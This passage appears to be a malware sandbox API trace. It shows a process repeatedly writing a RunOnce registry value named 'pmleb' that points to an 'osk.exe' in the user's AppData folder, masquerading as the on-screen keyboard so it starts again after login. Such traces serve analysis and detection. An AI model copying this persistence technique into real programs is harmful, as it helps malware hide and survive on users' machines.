HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.580] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.580] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.580] RegCloseKey (hKey=0x280) returned 0x0 [0082.580] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.580] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.580] SetTimer (hWnd=0x20280, nIDEvent=0x20f9, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f9 [0082.581] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.592] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.592] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.592] KillTimer (hWnd=0x20280, uIDEvent=0x20f9) returned 1 [0082.592] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.592] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.592] IUnknown:Release (This=0x787518) returned 0x1 [0082.593] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.593] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.593] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.593] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.593] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.593] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.593] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.593] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.593] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.593] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7e [0082.593] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.593] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7f [0082.593] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.594] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7e 
[0082.594] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.594] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.594] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.594] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.594] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.594] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.595] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.595] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.595] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.595] RegCloseKey (hKey=0x280) returned 0x0 [0082.595] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.595] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.595] SetTimer (hWnd=0x20280, nIDEvent=0x20fa, uElapse=0xa, lpTimerFunc=0x0) returned 0x20fa [0082.595] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.607] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.607] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.608] KillTimer (hWnd=0x20280, uIDEvent=0x20fa) returned 1 [0082.608] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.608] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.608] IUnknown:Release (This=0x787518) returned 0x1 [0082.608] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.608] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.608] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.608] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.609] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.609] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.609] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.609] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.609] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.609] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7f [0082.609] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.609] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x80 [0082.609] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.610] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7f [0082.610] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.610] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.610] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0082.610] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.610] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.610] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.610] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.610] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.610] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.611] RegCloseKey (hKey=0x280) returned 0x0 [0082.611] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.611] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.611] SetTimer (hWnd=0x20280, nIDEvent=0x20fb, uElapse=0xa, lpTimerFunc=0x0) returned 0x20fb [0082.611] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, 
wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.629] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.629] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.629] KillTimer (hWnd=0x20280, uIDEvent=0x20fb) returned 1 [0082.630] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.630] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.630] IUnknown:Release (This=0x787518) returned 0x1 [0082.630] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.630] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.630] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), 
puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.630] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.630] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.630] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.630] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.630] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.630] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.631] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x80 [0082.631] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.631] 
FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x81 [0082.631] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.631] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x80 [0082.632] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.632] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.632] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.632] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.632] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.632] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.632] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.632] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.632] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.632] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.632] RegCloseKey (hKey=0x280) returned 0x0 [0082.632] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.632] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.632] SetTimer (hWnd=0x20280, nIDEvent=0x20fc, uElapse=0xa, lpTimerFunc=0x0) returned 0x20fc 